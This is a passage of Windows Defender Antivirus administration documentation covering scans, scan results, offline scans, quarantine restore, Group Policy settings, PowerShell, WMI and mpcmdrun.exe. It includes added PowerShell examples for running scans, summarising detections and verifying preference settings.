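# Assumption: the Set method takes the MSFT_MpPreference properties as named arguments.
Invoke-CimMethod -Namespace root/Microsoft/Windows/Defender -ClassName MSFT_MpPreference `
                 -MethodName Set -Arguments @{ ScanOnlyIfIdleEnabled = $true }
```

Run Get-ScanSchedule again after a Group Policy refresh on a domain-joined machine: if a GPO manages any of these settings, the value you see is the policy's, not the one set locally, which is the behaviour the Prevent or allow users to locally modify policy settings topic describes.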

Related topics
Prevent or allow users to locally modify policy settings
Configure and run on-demand Windows Defender Antivirus scans
Configure Windows Defender Antivirus scanning options
Manage Windows Defender Antivirus updates and apply baselines
Manage when protection updates should be downloaded and applied
Windows Defender Antivirus in Windows 10
Configure and run on-demand Windows Defender Antivirus scans
4/5/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
You can run an on-demand scan on individual endpoints. These scans will start immediately, and you can
define parameters for the scan, such as the location or type.

Quick scan versus full scan


Quick scan looks at all the locations where there could be malware registered to start with the system, such
as registry keys and known Windows startup folders.
Combined with always-on real-time protection capability - which reviews files when they are opened and
closed, and whenever a user navigates to a folder - a quick scan helps provide strong coverage both for
malware that starts with the system and kernel-level malware.
In most instances, this means a quick scan is adequate to find malware that wasn't picked up by real-time
protection.
A full scan can be useful on endpoints that have encountered a malware threat to identify if there are any
inactive components that require a more thorough clean-up, and can be ideal when running on-demand
scans.

NOTE
By default, quick scans run on mounted removable devices, such as USB drives.

Use Configuration Manager to run a scan:


See Antimalware and firewall tasks: How to perform an on-demand scan for details on using System Center
Configuration Manager (current branch) to run a scan.
Use the mpcmdrun.exe command-line utility to run a scan:
Use the following -scan parameter:

mpcmdrun.exe -scan -scantype 1

See Use the mpcmdrun.exe command-line tool to configure and manage Windows Defender Antivirus for
more information on how to use the tool and additional parameters, including starting a full scan or defining
paths.
Use Microsoft Intune to run a scan:
1. In Intune, go to Devices > All Devices and select the device you want to scan.
2. Select ...More and then select Quick Scan or Full Scan.
Use the Windows Security app to run a scan:
See Run a scan in the Windows Security app for instructions on running a scan on individual endpoints.
Use PowerShell cmdlets to run a scan:
Use the following cmdlet:

Start-MpScan

See Use PowerShell cmdlets to configure and run Windows Defender Antivirus and Defender cmdlets for
more information on how to use PowerShell with Windows Defender Antivirus.
Use Windows Management Instrumentation (WMI) to run a scan:
Use the Start method of the MSFT_MpScan class.
See the following for more information and allowed parameters:
Windows Defender WMIv2 APIs

Related topics
Configure Windows Defender Antivirus scanning options
Configure scheduled Windows Defender Antivirus scans
Windows Defender Antivirus in Windows 10
Review Windows Defender Antivirus scan results
4/5/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
After a Windows Defender Antivirus scan completes, whether it is an on-demand or scheduled scan, the results
are recorded and you can view them.
Use Microsoft Intune to review scan results:
1. In Intune, go to Devices > All Devices and select the device you want to scan.
2. Click the scan results in Device actions status.
Use Configuration Manager to review scan results:
See How to monitor Endpoint Protection status.
Use the Windows Security app to review scan results:
1. Open the Windows Security app by clicking the shield icon in the task bar or searching the start menu for
Defender.
2. Click the Virus & threat protection tile (or the shield icon on the left menu bar) and then the Scan
history label.
Click See full history for any of the sections to see previous detections and the action taken. You can
also clear the list.
Information about the last scan is displayed at the bottom of the page.
Use PowerShell cmdlets to review scan results:
The following cmdlet will return each detection on the endpoint. If there are multiple detections of the same
threat, each detection will be listed separately, based on the time of each detection:

Get-MpThreatDetection
You can specify -ThreatID to limit the output to only show the detections for a specific threat.
If you want to list threat detections, but combine detections of the same threat into a single item, you can use the
following cmdlet:

Get-MpThreat

See Use PowerShell cmdlets to configure and run Windows Defender Antivirus and Defender cmdlets for more
information on how to use PowerShell with Windows Defender Antivirus.
Use Windows Management Instrumentation (WMI) to review scan results:
Use the Get method of the MSFT_MpThreat and MSFT_MpThreatDetection classes.
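The script below is an added example, not code from the Microsoft page, and it serves both the on-demand scan topic above and this review topic: it starts a custom scan of one folder with Start-MpScan, then joins the per-event output of Get-MpThreatDetection with the per-threat output of Get-MpThreat into one summary row per threat that can be triaged or exported for a SIEM. The property names are those of the MSFT_MpThreat and MSFT_MpThreatDetection classes the page refers to; the scan path and the export location are constructed placeholders.

```powershell
# Added example (not from the Microsoft page): run an on-demand scan of a path and
# summarise the recorded detections. Scan path and CSV location are placeholders.
#Requires -RunAsAdministrator

$scanPath  = 'C:\Users\Public\Downloads'          # placeholder; choose your own target
$reportCsv = Join-Path $env:TEMP 'defender-detections.csv'

# Custom scan of one folder. -ScanType also accepts QuickScan and FullScan.
Start-MpScan -ScanType CustomScan -ScanPath $scanPath

function Get-DetectionSummary {
    # One row per threat: name, severity, number of detection events, first and last
    # time seen, the resources involved and whether every action succeeded.
    # Get-MpThreatDetection lists every event; Get-MpThreat carries the name and
    # severity for each threat, so the two are joined on ThreatID.
    $threats = @{}
    foreach ($t in Get-MpThreat) { $threats[$t.ThreatID] = $t }

    Get-MpThreatDetection | Group-Object ThreatID | ForEach-Object {
        $events = @($_.Group | Sort-Object InitialDetectionTime)
        $meta   = $threats[$events[0].ThreatID]
        [pscustomobject]@{
            ThreatID      = $events[0].ThreatID
            ThreatName    = $meta.ThreatName
            Severity      = $meta.SeverityID       # 1 Low, 2 Moderate, 4 High, 5 Severe
            Detections    = $events.Count
            FirstSeen     = $events[0].InitialDetectionTime
            LastSeen      = $events[-1].InitialDetectionTime
            Resources     = (@($events.Resources) | Sort-Object -Unique) -join '; '
            AllRemediated = -not ($events | Where-Object { -not $_.ActionSuccess })
        }
    }
}

$summary = @(Get-DetectionSummary)
if ($summary.Count -gt 0) {
    # Highest severity first, then persist the table for the incident record.
    $summary | Sort-Object Severity -Descending | Format-Table -AutoSize
    $summary | Export-Csv -Path $reportCsv -NoTypeInformation
    "Exported $($summary.Count) threat summaries to $reportCsv"
} else {
    'No detections recorded on this endpoint.'
}
```

A row whose AllRemediated value is False is the one to look at first: it means at least one detection event for that threat did not complete its action, which is the case the remediation-required full scan described in the scheduled scans topic exists for.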

Related topics
Customize, initiate, and review the results of Windows Defender Antivirus scans and remediation
Windows Defender Antivirus in Windows 10
Run and review the results of a Windows Defender Offline scan
4/5/2019 • 3 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
Windows Defender Offline is an antimalware scanning tool that lets you boot and run a scan from a trusted
environment. The scan runs from outside the normal Windows kernel so it can target malware that attempts to
bypass the Windows shell, such as viruses and rootkits that infect or overwrite the master boot record (MBR).
You can use Windows Defender Offline if you suspect a malware infection, or you want to confirm a thorough
clean of the endpoint after a malware outbreak.
In Windows 10, Windows Defender Offline can be run with one click directly from the Windows Security app. In
previous versions of Windows, a user had to install Windows Defender Offline to bootable media, restart the
endpoint, and load the bootable media.

Pre-requisites and requirements


Windows Defender Offline in Windows 10 has the same hardware requirements as Windows 10.
For more information about Windows 10 requirements, see the following topics:
Minimum hardware requirements
Hardware component guidelines

NOTE
Windows Defender Offline is not supported on machines with ARM processors, or on Windows Server Stock Keeping Units.

To run Windows Defender Offline from the endpoint, the user must be logged in with administrator privileges.

Windows Defender Offline updates


Windows Defender Offline uses the most recent protection updates available on the endpoint; it's updated
whenever Windows Defender Antivirus is updated.

NOTE
Before running an offline scan, you should attempt to update Windows Defender AV protection. You can either force an
update with Group Policy or however you normally deploy updates to endpoints, or you can manually download and install
the latest protection updates from the Microsoft Malware Protection Center.

See the Manage Windows Defender Antivirus Security intelligence updates topic for more information.

Usage scenarios
In Windows 10, version 1607, you can manually force an offline scan. Alternatively, if Windows Defender
determines that Windows Defender Offline needs to run, it will prompt the user on the endpoint.
The need to perform an offline scan will also be revealed in System Center Configuration Manager if you're using
it to manage your endpoints.
The prompt can occur via a notification, similar to the following:

The user will also be notified within the Windows Defender client:

In Configuration Manager, you can identify the status of endpoints by navigating to Monitoring > Overview >
Security > Endpoint Protection Status > System Center Endpoint Protection Status.
Windows Defender Offline scans are indicated under Malware remediation status as Offline scan required.
Configure notifications
Windows Defender Offline notifications are configured in the same policy setting as other Windows Defender AV
notifications.
For more information about notifications in Windows Defender, see the Configure the notifications that appear on
endpoints topic.

Run a scan
IMPORTANT
Before you use Windows Defender Offline, make sure you save any files and shut down running programs. The Windows
Defender Offline scan takes about 15 minutes to run. It will restart the endpoint when the scan is complete. The scan is
performed outside of the usual Windows operating environment. The user interface will appear different to a normal scan
performed by Windows Defender. After the scan is completed, the endpoint will be restarted and Windows will load normally.

You can run a Windows Defender Offline scan with the following:
PowerShell
Windows Management Instrumentation (WMI)
The Windows Security app
Use PowerShell cmdlets to run an offline scan:
Use the following cmdlets:

Start-MpWDOScan

See Use PowerShell cmdlets to configure and run Windows Defender Antivirus and Defender cmdlets for more
information on how to use PowerShell with Windows Defender Antivirus.
Use Windows Management Instrumentation (WMI) to run an offline scan:
Use the MSFT_MpWDOScan class to run an offline scan.
The following WMI script snippet will immediately run a Windows Defender Offline scan, which will cause the
endpoint to restart, run the offline scan, and then restart and boot into Windows.

wmic /namespace:\\root\Microsoft\Windows\Defender path MSFT_MpWDOScan call Start

See the following for more information:


Windows Defender WMIv2 APIs
Use the Windows Defender Security app to run an offline scan:
1. Open the Windows Security app by clicking the shield icon in the task bar or searching the start menu for
Defender.
2. Click the Virus & threat protection tile (or the shield icon on the left menu bar) and then the Advanced
scan label:
3. Select Windows Defender Offline scan and click Scan now.
NOTE
In Windows 10, version 1607, the offline scan could be run from under Windows Settings > Update & security >
Windows Defender or from the Windows Defender client.

Review scan results


Windows Defender Offline scan results will be listed in the Scan history section of the Windows Security app.

Related topics
Customize, initiate, and review the results of scans and remediation
Windows Defender Antivirus in Windows 10
Restore quarantined files in Windows Defender AV
4/5/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
If Windows Defender Antivirus is configured to detect and remediate threats on your device, Windows Defender
Antivirus quarantines suspicious files. If you are certain these files do not present a threat, you can restore them.
1. Open Windows Security.
2. Click Virus & threat protection and then click Threat History.
3. Under Quarantined threats, click See full history.
4. Click an item you want to keep, then click Restore. (If you prefer to remove the item, you can click Remove.)

Related topics
Configure remediation for scans
Review scan results
Configure and validate exclusions based on file name, extension, and folder location
Configure and validate exclusions for files opened by processes
Configure Windows Defender Antivirus exclusions on Windows Server
Manage Windows Defender Antivirus in your business
4/5/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
You can manage and configure Windows Defender Antivirus with the following tools:
Microsoft Intune
System Center Configuration Manager
Group Policy
PowerShell cmdlets
Windows Management Instrumentation (WMI)
The mpcmdrun.exe utility
The topics in this section provide further information, links, and resources for using these tools to manage and
configure Windows Defender Antivirus.

In this section
TOPIC | DESCRIPTION

Manage Windows Defender Antivirus with Microsoft Intune and System Center Configuration Manager | Information about using Intune and System Center Configuration Manager to deploy, manage, report, and configure Windows Defender Antivirus

Manage Windows Defender Antivirus with Group Policy settings | List of all Group Policy settings located in ADMX templates

Manage Windows Defender Antivirus with PowerShell cmdlets | Instructions for using PowerShell cmdlets to manage Windows Defender Antivirus, plus links to documentation for all cmdlets and allowed parameters

Manage Windows Defender Antivirus with Windows Management Instrumentation (WMI) | Instructions for using WMI to manage Windows Defender Antivirus, plus links to documentation for the WMIv2 APIs (including all classes, methods, and properties)

Manage Windows Defender Antivirus with the mpcmdrun.exe command-line tool | Instructions on using the dedicated command-line tool to manage and use Windows Defender Antivirus
Use System Center Configuration Manager and Microsoft Intune to configure and manage Windows Defender Antivirus
4/5/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
If you are using System Center Configuration Manager or Microsoft Intune to manage the endpoints on your
network, you can also use them to manage Windows Defender Antivirus scans.
In some cases, the protection will be labeled as Endpoint Protection, although the engine is the same as that used
by Windows Defender Antivirus.
See the Endpoint Protection library on docs.microsoft.com for information on using Configuration Manager.
For Microsoft Intune, consult the Microsoft Intune library and Configure device restriction settings in Intune.

Related topics
Reference topics for management and configuration tools
Windows Defender Antivirus in Windows 10
Use Group Policy settings to configure and manage Windows Defender Antivirus
4/5/2019 • 8 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
You can use Group Policy to configure and manage Windows Defender Antivirus on your endpoints.
In general, you can use the following procedure to configure or change Windows Defender Antivirus group policy
settings:
1. On your Group Policy management machine, open the Group Policy Management Console, right-click the
Group Policy Object (GPO) you want to configure and click Edit.
2. In the Group Policy Management Editor go to Computer configuration.
3. Click Administrative templates.
4. Expand the tree to Windows components > Windows Defender Antivirus.
5. Expand the section (referred to as Location in the table in this topic) that contains the setting you want to
configure, double-click the setting to open it, and make configuration changes.
6. Deploy the updated GPO as you normally do.
The following table in this topic lists the Group Policy settings available in Windows 10, version 1703, and
provides links to the appropriate topic in this documentation library (where applicable).

LOCATION SETTING DOCUMENTED IN TOPIC

Client interface Enable headless UI mode Prevent users from seeing or


interacting with the Windows Defender
Antivirus user interface

Client interface Display additional text to clients when Configure the notifications that appear
they need to perform an action on endpoints

Client interface Suppress all notifications Configure the notifications that appear
on endpoints

Client interface Suppresses reboot notifications Configure the notifications that appear
on endpoints

Exclusions Extension Exclusions Configure and validate exclusions in


Windows Defender Antivirus scans

Exclusions Path Exclusions Configure and validate exclusions in


Windows Defender Antivirus scans

Exclusions Process Exclusions Configure and validate exclusions in


Windows Defender Antivirus scans
LOCATION SETTING DOCUMENTED IN TOPIC

Exclusions Turn off Auto Exclusions Configure and validate exclusions in


Windows Defender Antivirus scans

MAPS Configure the 'Block at First Sight' Enable block at first sight
feature

MAPS Join Microsoft MAPS Enable cloud-delivered protection

MAPS Send file samples when further analysis Enable cloud-delivered protection
is required

MAPS Configure local setting override for Prevent or allow users to locally modify
reporting to Microsoft MAPS policy settings

MpEngine Configure extended cloud check Configure the cloud block timeout
period

MpEngine Select cloud protection level Specify the cloud-delivered protection


level

Network inspection system Specify additional definition sets for Not used
network traffic inspection

Network inspection system Turn on definition retirement Not used

Network inspection system Turn on protocol recognition Not used

Quarantine Configure local setting override for the Prevent or allow users to locally modify
removal of items from Quarantine policy settings
folder

Quarantine Configure removal of items from Configure remediation for Windows


Quarantine folder Defender Antivirus scans

Real-time protection Configure local setting override for Prevent or allow users to locally modify
monitoring file and program activity on policy settings
your computer

Real-time protection Configure local setting override for Prevent or allow users to locally modify
monitoring for incoming and outgoing policy settings
file activity

Real-time protection Configure local setting override for Prevent or allow users to locally modify
scanning all downloaded files and policy settings
attachments

Real-time protection Configure local setting override for turn Prevent or allow users to locally modify
on behavior monitoring policy settings

Real-time protection Configure local setting override to turn Prevent or allow users to locally modify
on real-time protection policy settings
LOCATION SETTING DOCUMENTED IN TOPIC

Real-time protection | Define the maximum size of downloaded files and attachments to be scanned | Enable and configure Windows Defender Antivirus always-on protection and monitoring
Real-time protection | Monitor file and program activity on your computer | Enable and configure Windows Defender Antivirus always-on protection and monitoring
Real-time protection | Scan all downloaded files and attachments | Enable and configure Windows Defender Antivirus always-on protection and monitoring
Real-time protection | Turn off real-time protection | Enable and configure Windows Defender Antivirus always-on protection and monitoring
Real-time protection | Turn on behavior monitoring | Enable and configure Windows Defender Antivirus always-on protection and monitoring
Real-time protection | Turn on process scanning whenever real-time protection is enabled | Enable and configure Windows Defender Antivirus always-on protection and monitoring
Real-time protection | Turn on raw volume write notifications | Enable and configure Windows Defender Antivirus always-on protection and monitoring
Real-time protection | Configure monitoring for incoming and outgoing file and program activity | Enable and configure Windows Defender Antivirus always-on protection and monitoring
Remediation | Configure local setting override for the time of day to run a scheduled full scan to complete remediation | Prevent or allow users to locally modify policy settings
Remediation | Specify the day of the week to run a scheduled full scan to complete remediation | Configure scheduled Windows Defender Antivirus scans
Remediation | Specify the time of day to run a scheduled full scan to complete remediation | Configure scheduled Windows Defender Antivirus scans
Reporting | Configure Watson events | Not used
Reporting | Configure Windows software trace preprocessor components | Not used
Reporting | Configure WPP tracing level | Not used
Reporting | Configure time out for detections in critically failed state | Not used

Reporting | Configure time out for detections in non-critical failed state | Not used
Reporting | Configure time out for detections in recently remediated state | Not used
Reporting | Configure time out for detections requiring additional action | Not used
Reporting | Turn off enhanced notifications | Configure the notifications that appear on endpoints
Root | Turn off Windows Defender Antivirus | Not used (This setting must be set to Not configured to ensure any installed third-party antivirus apps work correctly)
Root | Define addresses to bypass proxy server | Not used
Root | Define proxy auto-config (.pac) for connecting to the network | Not used
Root | Define proxy server for connecting to the network | Not used
Root | Configure local administrator merge behavior for lists | Prevent or allow users to locally modify policy settings
Root | Allow antimalware service to startup with normal priority | Configure remediation for Windows Defender Antivirus scans
Root | Allow antimalware service to remain running always | Configure remediation for Windows Defender Antivirus scans
Root | Turn off routine remediation | Configure remediation for Windows Defender Antivirus scans
Root | Randomize scheduled task times | Configure scheduled scans for Windows Defender Antivirus
Scan | Allow users to pause scan | Prevent users from seeing or interacting with the Windows Defender Antivirus user interface
Scan | Check for the latest virus and spyware definitions before running a scheduled scan | Manage event-based forced updates
Scan | Define the number of days after which a catch-up scan is forced | Manage updates for endpoints that are out of date
Scan | Turn on catch up full scan | Manage updates for endpoints that are out of date

Scan | Turn on catch up quick scan | Manage updates for endpoints that are out of date
Scan | Configure local setting override for maximum percentage of CPU utilization | Prevent or allow users to locally modify policy settings
Scan | Configure local setting override for schedule scan day | Prevent or allow users to locally modify policy settings
Scan | Configure local setting override for scheduled quick scan time | Prevent or allow users to locally modify policy settings
Scan | Configure local setting override for scheduled scan time | Prevent or allow users to locally modify policy settings
Scan | Configure local setting override for the scan type to use for a scheduled scan | Prevent or allow users to locally modify policy settings
Scan | Create a system restore point | Configure remediation for Windows Defender Antivirus scans
Scan | Turn on removal of items from scan history folder | Configure remediation for Windows Defender Antivirus scans
Scan | Turn on heuristics | Enable and configure Windows Defender Antivirus always-on protection and monitoring
Scan | Turn on e-mail scanning | Configure scanning options in Windows Defender Antivirus
Scan | Turn on reparse point scanning | Configure scanning options in Windows Defender Antivirus
Scan | Run full scan on mapped network drives | Configure scanning options in Windows Defender Antivirus
Scan | Scan archive files | Configure scanning options in Windows Defender Antivirus
Scan | Scan network files | Configure scanning options in Windows Defender Antivirus
Scan | Scan packed executables | Configure scanning options in Windows Defender Antivirus
Scan | Scan removable drives | Configure scanning options in Windows Defender Antivirus
Scan | Specify the maximum depth to scan archive files | Configure scanning options in Windows Defender Antivirus
Scan | Specify the maximum percentage of CPU utilization during a scan | Configure scanning options in Windows Defender Antivirus

Scan | Specify the maximum size of archive files to be scanned | Configure scanning options in Windows Defender Antivirus
Scan | Specify the day of the week to run a scheduled scan | Configure scheduled scans for Windows Defender Antivirus
Scan | Specify the interval to run quick scans per day | Configure scheduled scans for Windows Defender Antivirus
Scan | Specify the scan type to use for a scheduled scan | Configure scheduled scans for Windows Defender Antivirus
Scan | Specify the time for a daily quick scan | Configure scheduled scans for Windows Defender Antivirus
Scan | Specify the time of day to run a scheduled scan | Configure scheduled scans for Windows Defender Antivirus
Scan | Start the scheduled scan only when computer is on but not in use | Configure scheduled scans for Windows Defender Antivirus
Security intelligence updates | Allow definition updates from Microsoft Update | Manage updates for mobile devices and virtual machines (VMs)
Security intelligence updates | Allow definition updates when running on battery power | Manage updates for mobile devices and virtual machines (VMs)
Security intelligence updates | Allow notifications to disable definitions based reports to Microsoft MAPS | Manage event-based forced updates
Security intelligence updates | Allow real-time definition updates based on reports to Microsoft MAPS | Manage event-based forced updates
Security intelligence updates | Check for the latest virus and spyware definitions on startup | Manage event-based forced updates
Security intelligence updates | Define file shares for downloading definition updates | Manage Windows Defender Antivirus protection and definition updates
Security intelligence updates | Define the number of days after which a catch up definition update is required | Manage updates for endpoints that are out of date
Security intelligence updates | Define the number of days before spyware definitions are considered out of date | Manage updates for endpoints that are out of date
Security intelligence updates | Define the number of days before virus definitions are considered out of date | Manage updates for endpoints that are out of date
Security intelligence updates | Define the order of sources for downloading definition updates | Manage Windows Defender Antivirus protection and definition updates
Security intelligence updates | Initiate definition update on startup | Manage event-based forced updates

Security intelligence updates | Specify the day of the week to check for definition updates | Manage when protection updates should be downloaded and applied
Security intelligence updates | Specify the interval to check for definition updates | Manage when protection updates should be downloaded and applied
Security intelligence updates | Specify the time to check for definition updates | Manage when protection updates should be downloaded and applied
Security intelligence updates | Turn on scan after Security intelligence update | Configure scheduled scans for Windows Defender Antivirus
Threats | Specify threat alert levels at which default action should not be taken when detected | Configure remediation for Windows Defender Antivirus scans
Threats | Specify threats upon which default action should not be taken when detected | Configure remediation for Windows Defender Antivirus scans

Related topics
Reference topics for management and configuration tools
Windows Defender Antivirus in Windows 10
Use PowerShell cmdlets to configure and manage Windows Defender Antivirus
4/5/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
You can use PowerShell to perform various functions in Windows Defender. Similar to the command
prompt or command line, PowerShell is a task-based command-line shell and scripting language
designed especially for system administration, and you can read more about it at the PowerShell hub on
MSDN.
For a list of the cmdlets and their functions and available parameters, see the Defender cmdlets topic.
PowerShell cmdlets are most useful in Windows Server environments that don't rely on a graphical user
interface (GUI) to configure software.

NOTE
PowerShell cmdlets should not be used as a replacement for a full network policy management infrastructure,
such as System Center Configuration Manager, Group Policy Management Console, or Windows Defender
Antivirus Group Policy ADMX templates.

Changes made with PowerShell will affect local settings on the endpoint where the changes are
deployed or made. This means that deployments of policy with Group Policy, System Center
Configuration Manager, or Microsoft Intune can overwrite changes made with PowerShell.
You can configure which settings can be overridden locally with local policy overrides.
PowerShell is typically installed under the folder %SystemRoot%\system32\WindowsPowerShell.
Use Windows Defender Antivirus PowerShell cmdlets:
1. Click Start, type powershell, and press Enter.
2. Click Windows PowerShell to open the interface.
3. Enter the command and parameters.

NOTE
You may need to open an administrator-level version of PowerShell. Right-click the item in the Start menu, click
Run as administrator and click Yes at the permissions prompt.

To open online help for any of the cmdlets type the following:

Get-Help <cmdlet> -Online

Omit the -Online parameter to get locally cached help.
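As an added example (not code from this page), the following script applies several of the scheduled-scan and Security intelligence update settings listed in the Group Policy table above with the Defender cmdlets, then reads them back with Get-MpPreference. The cmdlet parameter names are real; the chosen values are illustrative assumptions. A setting that does not read back as set is usually being overwritten by Group Policy, System Center Configuration Manager or Intune, which is the caveat this section describes.

```powershell
#Requires -RunAsAdministrator
# Added example, not Microsoft's code. Applies local Windows Defender Antivirus
# preferences with Set-MpPreference and verifies them with Get-MpPreference.
# The values below are illustrative assumptions; the names are the cmdlet's own.

# Keys are Get-MpPreference property names, which are also the parameter names of
# Set-MpPreference, so the same table can be splatted into the Set call.
$desired = @{
    ScanScheduleDay                     = 0            # 0 = every day (Specify the day of the week to run a scheduled scan)
    ScanScheduleTime                    = '02:00:00'   # local time (Specify the time of day to run a scheduled scan)
    ScanParameters                      = 1            # 1 = quick, 2 = full (Specify the scan type to use for a scheduled scan)
    ScanOnlyIfIdleEnabled               = $true        # Start the scheduled scan only when computer is on but not in use
    CheckForSignaturesBeforeRunningScan = $true        # Check for the latest definitions before running a scheduled scan
    DisableCatchupQuickScan             = $false       # Turn on catch up quick scan
    SignatureUpdateInterval             = 4            # hours (Specify the interval to check for definition updates)
    SignatureFallbackOrder              = 'MicrosoftUpdateServer|MMPC'  # Define the order of sources for downloading definition updates
    ScanAvgCPULoadFactor                = 50           # percent (Specify the maximum percentage of CPU utilization during a scan)
}

function Set-DefenderPreferenceChecked {
    param([hashtable]$Desired)

    # Apply everything in one call.
    Set-MpPreference @Desired

    # Read the effective values back and collect anything that did not take.
    $actual = Get-MpPreference
    $drift = foreach ($name in $Desired.Keys) {
        $want = "$($Desired[$name])"    # normalise bool / int / TimeSpan to their string forms
        $have = "$($actual.$name)"
        if ($want -ne $have) {
            [pscustomobject]@{ Setting = $name; Wanted = $want; Actual = $have }
        }
    }

    if ($drift) {
        # Typical cause: a Group Policy, SCCM or Intune policy owns the setting and
        # re-applies its own value. Fix it at the policy level, not locally.
        Write-Warning 'Some settings did not take effect locally; check for an overriding policy:'
        $drift | Format-Table -AutoSize | Out-Host
    } else {
        Write-Host 'All settings applied and verified on the local machine.'
    }
    return $drift
}

$null = Set-DefenderPreferenceChecked -Desired $desired
```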

Related topics
Reference topics for management and configuration tools
Windows Defender Antivirus in Windows 10
Use Windows Management Instrumentation (WMI) to configure and manage Windows Defender Antivirus
4/5/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
Windows Management Instrumentation (WMI) is a scripting interface that allows you to retrieve, modify, and
update settings.
Read more about WMI at the Microsoft Developer Network System Administration library.
Windows Defender Antivirus has a number of specific WMI classes that can be used to perform most of the same
functions as Group Policy and other management tools. Many of the classes are analogous to Defender
PowerShell cmdlets.
The MSDN Windows Defender WMIv2 Provider reference library lists the available WMI classes for Windows
Defender Antivirus, and includes example scripts.
Changes made with WMI will affect local settings on the endpoint where the changes are deployed or made. This
means that deployments of policy with Group Policy, System Center Configuration Manager, or Microsoft Intune
can overwrite changes made with WMI.
You can configure which settings can be overridden locally with local policy overrides.

Related topics
Reference topics for management and configuration tools
Windows Defender Antivirus in Windows 10
Configure and manage Windows Defender Antivirus with the mpcmdrun.exe command-line tool
4/5/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
You can perform various Windows Defender Antivirus functions with the dedicated command-line tool
mpcmdrun.exe.
This utility can be useful when you want to automate Windows Defender Antivirus use.
You can find the utility in %ProgramFiles%\Windows Defender\MpCmdRun.exe. You must run it from a
command prompt.

NOTE
You may need to open an administrator-level version of the command prompt. Right-click the item in the Start menu, click
Run as administrator and click Yes at the permissions prompt.

The utility has the following commands:

MpCmdRun.exe [command] [-options]

COMMAND | DESCRIPTION
-? or -h | Displays all available options for this tool
-Scan [-ScanType #] [-File [-DisableRemediation] [-BootSectorScan]] [-Timeout] [-Cancel] | Scans for malicious software
-Trace [-Grouping #] [-Level #] | Starts diagnostic tracing
-GetFiles | Collects support information
-GetFilesDiagTrack | Same as -GetFiles but outputs to temporary DiagTrack folder
-RemoveDefinitions [-All] | Restores the installed Security intelligence to a previous backup copy or to the original default set
-RemoveDefinitions [-DynamicSignatures] | Removes only the dynamically downloaded Security intelligence
-RemoveDefinitions [-Engine] | Restores the previous installed engine
-SignatureUpdate [-UNC|-MMPC] | Checks for new Security intelligence updates
-Restore [-ListAll|[[-Name] [-All]|[-FilePath]] [-Path]] | Restores or lists quarantined item(s)
-AddDynamicSignature [-Path] | Loads dynamic Security intelligence
-ListAllDynamicSignatures | Lists the loaded dynamic Security intelligence
-RemoveDynamicSignature [-SignatureSetID] | Removes dynamic Security intelligence
-CheckExclusion -path | Checks whether a path is excluded
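An added example (not from this page) of automating the tool from PowerShell: it refreshes Security intelligence, runs a quick scan and checks whether a directory is excluded, using the commands in the table above and recording the exit code and output of each run. The meaning of exit code 0 (completed with nothing found) and the example path are assumptions of mine.

```powershell
#Requires -RunAsAdministrator
# Added example, not Microsoft's code: drive MpCmdRun.exe from PowerShell and keep
# the exit code and output of every call for logging. Exit code 0 is treated as
# "completed, nothing found" (assumption); anything else is flagged for review.

$MpCmdRun = Join-Path $env:ProgramFiles 'Windows Defender\MpCmdRun.exe'

function Invoke-MpCmdRun {
    param([string[]]$Arguments)
    if (-not (Test-Path $MpCmdRun)) { throw "MpCmdRun.exe not found at $MpCmdRun" }
    # Merge stderr into stdout so the whole transcript is kept with the exit code.
    $output = & $MpCmdRun @Arguments 2>&1 | ForEach-Object { "$_" }
    [pscustomobject]@{
        Command  = ($Arguments -join ' ')
        ExitCode = $LASTEXITCODE
        Output   = ($output -join [Environment]::NewLine)
    }
}

# 1. Check for new Security intelligence updates.
$update = Invoke-MpCmdRun -Arguments '-SignatureUpdate'

# 2. Quick scan. ScanType values: 0 default, 1 quick, 2 full, 3 custom (with -File <path>).
$scan = Invoke-MpCmdRun -Arguments '-Scan', '-ScanType', '1'

# 3. Confirm that a directory users download into is not excluded from scanning
#    (constructed example path).
$excl = Invoke-MpCmdRun -Arguments '-CheckExclusion', '-path', 'C:\Users\Public\Downloads'

foreach ($r in $update, $scan, $excl) {
    $state = if ($r.ExitCode -eq 0) { 'OK' } else { "exit code $($r.ExitCode), review output" }
    Write-Host ("[{0}] MpCmdRun.exe {1}" -f $state, $r.Command)
    Write-Host $r.Output
}
```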

Related topics
Reference topics for management and configuration tools
Windows Defender Antivirus in Windows 10
Configure the security controls in Secure score
4/22/2019 • 10 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
Each security control lists recommendations that you can take to increase the security posture of your
organization.
Endpoint detection and response (EDR) optimization
For a machine to be considered "well configured", it must comply with a minimum baseline configuration setting.
This tile shows you a specific list of actions you must apply on endpoints so that the minimum baseline
configuration setting for your Endpoint detection and response tool is fulfilled.

IMPORTANT
This feature is available for machines on Windows 10, version 1607 or later.

Minimum baseline configuration setting for EDR:
Windows Defender ATP sensor is on
Data collection is working correctly
Communication to Windows Defender ATP service is not impaired
Recommended actions:

You can take the following actions to increase the overall security score of your organization:
Turn on sensor
Fix sensor data collection
Fix impaired communications
For more information, see Fix unhealthy sensors.
Windows Defender Antivirus (Windows Defender AV) optimization
For a machine to be considered "well configured", it must comply with a minimum baseline configuration setting.
This tile shows you a specific list of actions you must apply on endpoints so that the minimum baseline
configuration setting for Windows Defender AV is fulfilled.

IMPORTANT
This feature is available for machines on Windows 10, version 1607 or later.

Minimum baseline configuration setting for Windows Defender AV:
Machines are considered "well configured" for Windows Defender AV if the following requirements are met:
Windows Defender AV is reporting correctly
Windows Defender AV is turned on
Security intelligence is up to date
Real-time protection is on
Potentially Unwanted Application (PUA) protection is enabled
Recommended actions:

You can take the following actions to increase the overall security score of your organization:

NOTE
For the Windows Defender Antivirus properties to show, you'll need to ensure that the Windows Defender Antivirus
Cloud-based protection is properly configured on the machine.

Fix antivirus reporting
